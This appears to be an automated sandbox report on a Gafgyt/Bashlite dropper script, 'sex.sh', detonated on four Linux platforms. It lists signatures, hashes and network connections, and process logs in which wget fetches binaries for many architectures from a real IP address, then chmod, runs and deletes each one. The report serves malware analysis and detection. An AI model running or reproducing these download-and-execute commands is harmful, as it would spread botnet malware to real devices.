Analysis Overview
SHA256
bee780a07d3c76bc39ab97f88050339da7c3231987c32e14aca61515d7a0c276
Threat Level: Known bad
The file sex.sh was found to be: Known bad.
Malicious Activity Summary
Detected Gafgyt variant
Gafgyt/Bashlite
Executes dropped EXE
Changes its process name
Writes file to tmp directory
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-08-04 13:39
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-04 13:39
Reported
2024-08-04 13:41
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
4s
Max time network
131s
Command Line
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gafgyt/Bashlite
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/arm61 | /tmp/arm61 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/arm61 | /usr/bin/wget | N/A |
Processes
/tmp/sex.sh
[/tmp/sex.sh]
/usr/bin/wget
[wget http://216.172.177.16/mips]
/bin/chmod
[chmod +x mips]
/tmp/mips
[./mips]
/bin/rm
[rm -rf mips]
/usr/bin/wget
[wget http://216.172.177.16/mipsel]
/bin/chmod
[chmod +x mipsel]
/tmp/mipsel
[./mipsel]
/bin/rm
[rm -rf mipsel]
/usr/bin/wget
[wget http://216.172.177.16/sh4]
/bin/chmod
[chmod +x sh4]
/tmp/sh4
[./sh4]
/bin/rm
[rm -rf sh4]
/usr/bin/wget
[wget http://216.172.177.16/x86]
/bin/chmod
[chmod +x x86]
/tmp/x86
[./x86]
/bin/rm
[rm -rf x86]
/usr/bin/wget
[wget http://216.172.177.16/arm61]
/bin/chmod
[chmod +x arm61]
/tmp/arm61
[./arm61]
/bin/rm
[rm -rf arm61]
/usr/bin/wget
[wget http://216.172.177.16/i686]
/bin/chmod
[chmod +x i686]
/tmp/i686
[./i686]
/bin/rm
[rm -rf i686]
/usr/bin/wget
[wget http://216.172.177.16/ppc]
/bin/chmod
[chmod +x ppc]
/tmp/ppc
[./ppc]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://216.172.177.16/586]
/bin/chmod
[chmod +x 586]
/tmp/586
[./586]
/bin/rm
[rm -rf 586]
/usr/bin/wget
[wget http://216.172.177.16/m68k]
/bin/chmod
[chmod +x m68k]
/tmp/m68k
[./m68k]
/bin/rm
[rm -rf m68k]
/usr/bin/wget
[wget http://216.172.177.16/dc]
/bin/chmod
[chmod +x dc]
/tmp/dc
[./dc]
/bin/rm
[rm -rf dc]
/usr/bin/wget
[wget http://216.172.177.16/dss]
/bin/chmod
[chmod +x dss]
/tmp/dss
[./dss]
/bin/rm
[rm -rf dss]
/usr/bin/wget
[wget http://216.172.177.16/co]
/bin/chmod
[chmod +x co]
/tmp/co
[./co]
/bin/rm
[rm -rf co]
/usr/bin/wget
[wget http://216.172.177.16/scar]
/bin/chmod
[chmod +x scar]
/tmp/scar
[./scar]
/bin/rm
[rm -rf scar]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| GB | 89.187.167.4:443 | tcp | |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
Files
/tmp/arm61
| MD5 | 6820e48a7c8f9b287da8f0593b0a8f83 |
| SHA1 | 4e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f |
| SHA256 | eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811 |
| SHA512 | 0dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c |
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-04 13:39
Reported
2024-08-04 13:42
Platform
debian9-armhf-20240611-en
Max time kernel
145s
Max time network
172s
Command Line
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gafgyt/Bashlite
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/arm61 | /tmp/arm61 | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/arm61 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/arm61 | /usr/bin/wget | N/A |
Processes
/tmp/sex.sh
[/tmp/sex.sh]
/usr/bin/wget
[wget http://216.172.177.16/mips]
/bin/chmod
[chmod +x mips]
/tmp/mips
[./mips]
/bin/rm
[rm -rf mips]
/usr/bin/wget
[wget http://216.172.177.16/mipsel]
/bin/chmod
[chmod +x mipsel]
/tmp/mipsel
[./mipsel]
/bin/rm
[rm -rf mipsel]
/usr/bin/wget
[wget http://216.172.177.16/sh4]
/bin/chmod
[chmod +x sh4]
/tmp/sh4
[./sh4]
/bin/rm
[rm -rf sh4]
/usr/bin/wget
[wget http://216.172.177.16/x86]
/bin/chmod
[chmod +x x86]
/tmp/x86
[./x86]
/bin/rm
[rm -rf x86]
/usr/bin/wget
[wget http://216.172.177.16/arm61]
/bin/chmod
[chmod +x arm61]
/tmp/arm61
[./arm61]
/bin/rm
[rm -rf arm61]
/usr/bin/wget
[wget http://216.172.177.16/i686]
/bin/chmod
[chmod +x i686]
/tmp/i686
[./i686]
/bin/rm
[rm -rf i686]
/usr/bin/wget
[wget http://216.172.177.16/ppc]
/bin/chmod
[chmod +x ppc]
/tmp/ppc
[./ppc]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://216.172.177.16/586]
/bin/chmod
[chmod +x 586]
/tmp/586
[./586]
/bin/rm
[rm -rf 586]
/usr/bin/wget
[wget http://216.172.177.16/m68k]
/bin/chmod
[chmod +x m68k]
/tmp/m68k
[./m68k]
/bin/rm
[rm -rf m68k]
/usr/bin/wget
[wget http://216.172.177.16/dc]
/bin/chmod
[chmod +x dc]
/tmp/dc
[./dc]
/bin/rm
[rm -rf dc]
/usr/bin/wget
[wget http://216.172.177.16/dss]
/bin/chmod
[chmod +x dss]
/tmp/dss
[./dss]
/bin/rm
[rm -rf dss]
/usr/bin/wget
[wget http://216.172.177.16/co]
/bin/chmod
[chmod +x co]
/tmp/co
[./co]
/bin/rm
[rm -rf co]
/usr/bin/wget
[wget http://216.172.177.16/scar]
/bin/chmod
[chmod +x scar]
/tmp/scar
[./scar]
/bin/rm
[rm -rf scar]
Network
| Country | Destination | Domain | Proto |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 5.252.177.70:23 | tcp | |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 5.252.177.70:23 | tcp | |
| US | 5.252.177.70:23 | tcp | |
| US | 5.252.177.70:23 | tcp | |
| US | 5.252.177.70:23 | tcp | |
| US | 5.252.177.70:23 | tcp | |
| US | 5.252.177.70:23 | tcp | |
| US | 5.252.177.70:23 | tcp | |
| US | 5.252.177.70:23 | tcp | |
| US | 5.252.177.70:23 | tcp | |
| US | 5.252.177.70:23 | tcp | |
| US | 5.252.177.70:23 | tcp | |
| US | 5.252.177.70:23 | tcp | |
| US | 5.252.177.70:23 | tcp | |
| US | 5.252.177.70:23 | tcp | |
| US | 5.252.177.70:23 | tcp | |
| US | 5.252.177.70:23 | tcp | |
| US | 5.252.177.70:23 | tcp | |
| US | 5.252.177.70:23 | tcp |
Files
/tmp/arm61
| MD5 | 6820e48a7c8f9b287da8f0593b0a8f83 |
| SHA1 | 4e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f |
| SHA256 | eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811 |
| SHA512 | 0dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c |
memory/747-1-0xb66ba000-0xb66cb044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-04 13:39
Reported
2024-08-04 13:41
Platform
debian9-mipsbe-20240611-en
Max time kernel
13s
Max time network
15s
Command Line
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gafgyt/Bashlite
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/arm61 | /tmp/arm61 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/arm61 | /usr/bin/wget | N/A |
Processes
/tmp/sex.sh
[/tmp/sex.sh]
/usr/bin/wget
[wget http://216.172.177.16/mips]
/bin/chmod
[chmod +x mips]
/tmp/mips
[./mips]
/bin/rm
[rm -rf mips]
/usr/bin/wget
[wget http://216.172.177.16/mipsel]
/bin/chmod
[chmod +x mipsel]
/tmp/mipsel
[./mipsel]
/bin/rm
[rm -rf mipsel]
/usr/bin/wget
[wget http://216.172.177.16/sh4]
/bin/chmod
[chmod +x sh4]
/tmp/sh4
[./sh4]
/bin/rm
[rm -rf sh4]
/usr/bin/wget
[wget http://216.172.177.16/x86]
/bin/chmod
[chmod +x x86]
/tmp/x86
[./x86]
/bin/rm
[rm -rf x86]
/usr/bin/wget
[wget http://216.172.177.16/arm61]
/bin/chmod
[chmod +x arm61]
/tmp/arm61
[./arm61]
/bin/rm
[rm -rf arm61]
/usr/bin/wget
[wget http://216.172.177.16/i686]
/bin/chmod
[chmod +x i686]
/tmp/i686
[./i686]
/bin/rm
[rm -rf i686]
/usr/bin/wget
[wget http://216.172.177.16/ppc]
/bin/chmod
[chmod +x ppc]
/tmp/ppc
[./ppc]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://216.172.177.16/586]
/bin/chmod
[chmod +x 586]
/tmp/586
[./586]
/bin/rm
[rm -rf 586]
/usr/bin/wget
[wget http://216.172.177.16/m68k]
/bin/chmod
[chmod +x m68k]
/tmp/m68k
[./m68k]
/bin/rm
[rm -rf m68k]
/usr/bin/wget
[wget http://216.172.177.16/dc]
/bin/chmod
[chmod +x dc]
/tmp/dc
[./dc]
/bin/rm
[rm -rf dc]
/usr/bin/wget
[wget http://216.172.177.16/dss]
/bin/chmod
[chmod +x dss]
/tmp/dss
[./dss]
/bin/rm
[rm -rf dss]
/usr/bin/wget
[wget http://216.172.177.16/co]
/bin/chmod
[chmod +x co]
/tmp/co
[./co]
/bin/rm
[rm -rf co]
/usr/bin/wget
[wget http://216.172.177.16/scar]
/bin/chmod
[chmod +x scar]
/tmp/scar
[./scar]
/bin/rm
[rm -rf scar]
Network
| Country | Destination | Domain | Proto |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
Files
/tmp/arm61
| MD5 | 6820e48a7c8f9b287da8f0593b0a8f83 |
| SHA1 | 4e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f |
| SHA256 | eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811 |
| SHA512 | 0dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c |
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-04 13:39
Reported
2024-08-04 13:41
Platform
debian9-mipsel-20240418-en
Max time kernel
13s
Max time network
15s
Command Line
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gafgyt/Bashlite
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/arm61 | /tmp/arm61 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/arm61 | /usr/bin/wget | N/A |
Processes
/tmp/sex.sh
[/tmp/sex.sh]
/usr/bin/wget
[wget http://216.172.177.16/mips]
/bin/chmod
[chmod +x mips]
/tmp/mips
[./mips]
/bin/rm
[rm -rf mips]
/usr/bin/wget
[wget http://216.172.177.16/mipsel]
/bin/chmod
[chmod +x mipsel]
/tmp/mipsel
[./mipsel]
/bin/rm
[rm -rf mipsel]
/usr/bin/wget
[wget http://216.172.177.16/sh4]
/bin/chmod
[chmod +x sh4]
/tmp/sh4
[./sh4]
/bin/rm
[rm -rf sh4]
/usr/bin/wget
[wget http://216.172.177.16/x86]
/bin/chmod
[chmod +x x86]
/tmp/x86
[./x86]
/bin/rm
[rm -rf x86]
/usr/bin/wget
[wget http://216.172.177.16/arm61]
/bin/chmod
[chmod +x arm61]
/tmp/arm61
[./arm61]
/bin/rm
[rm -rf arm61]
/usr/bin/wget
[wget http://216.172.177.16/i686]
/bin/chmod
[chmod +x i686]
/tmp/i686
[./i686]
/bin/rm
[rm -rf i686]
/usr/bin/wget
[wget http://216.172.177.16/ppc]
/bin/chmod
[chmod +x ppc]
/tmp/ppc
[./ppc]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://216.172.177.16/586]
/bin/chmod
[chmod +x 586]
/tmp/586
[./586]
/bin/rm
[rm -rf 586]
/usr/bin/wget
[wget http://216.172.177.16/m68k]
/bin/chmod
[chmod +x m68k]
/tmp/m68k
[./m68k]
/bin/rm
[rm -rf m68k]
/usr/bin/wget
[wget http://216.172.177.16/dc]
/bin/chmod
[chmod +x dc]
/tmp/dc
[./dc]
/bin/rm
[rm -rf dc]
/usr/bin/wget
[wget http://216.172.177.16/dss]
/bin/chmod
[chmod +x dss]
/tmp/dss
[./dss]
/bin/rm
[rm -rf dss]
/usr/bin/wget
[wget http://216.172.177.16/co]
/bin/chmod
[chmod +x co]
/tmp/co
[./co]
/bin/rm
[rm -rf co]
/usr/bin/wget
[wget http://216.172.177.16/scar]
/bin/chmod
[chmod +x scar]
/tmp/scar
[./scar]
/bin/rm
[rm -rf scar]
Network
| Country | Destination | Domain | Proto |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
Files
/tmp/arm61
| MD5 | 6820e48a7c8f9b287da8f0593b0a8f83 |
| SHA1 | 4e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f |
| SHA256 | eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811 |
| SHA512 | 0dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c |